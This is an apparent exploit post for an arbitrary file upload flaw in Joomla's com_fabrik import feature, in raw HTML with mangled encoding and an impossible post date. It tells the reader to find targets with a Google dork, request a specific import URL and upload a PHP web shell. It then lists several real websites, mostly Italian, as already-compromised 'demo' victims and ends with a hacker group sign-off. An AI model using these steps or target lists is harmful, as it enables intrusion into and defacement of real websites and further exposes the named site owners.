F3D4's Joomla Arbitrary File Upload Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>F3D4Ä°'s Joomla Arbitrary File Upload Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title : F3D4Ä°'s Joomla Arbitrary File Upload Vulnerability # Google Dork : inurl:viewtable?cid= site:it # Tested On : [ Windows- Linux ] # Date: 07.01.2017 # Exploit Author: F3D4Ä° #Author Details:twitter.com/f3d4i6 #Tested on: Kali Linux 2.0 / Windows 7-8-10 #Youtube LÄ°nk : https://youtu.be/TFEVrNYuJBk ###################### # [+] DESCRIPTION : ###################### # 1:Search Google Dork and Choose a Target # 2: exploit: /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0 # 3: upload shell.php or index.html # 4: Poc: http://www.localhost.com/media/index.... or http://www.localhost.com/media/shell.php ------------------------------------------------ This exploit working all joomla verison but website of kind italia. #demo: http://www.ghostshockey.it/media/index.html http://www.notaiopulvirenti.it/media/index.html http://www.alphasoft.it/media/index.html http://deuil61.123.fr/media/index.html http://www.filuse.it/sito/media/index.html http://www.aquoschemical.it/sito/media/index.html http://www.decanatoappianogentile.it/grest/media/index.html http://www.multimediaform.it/media/index.html #Br0thers: By B0zoklu - Tmk - Kara Murat -Trajedi - DArkSide - DarkDemon - E.C - M4ni4c - M4DD3 #We are Turkish Hackers</BODY></HTML>
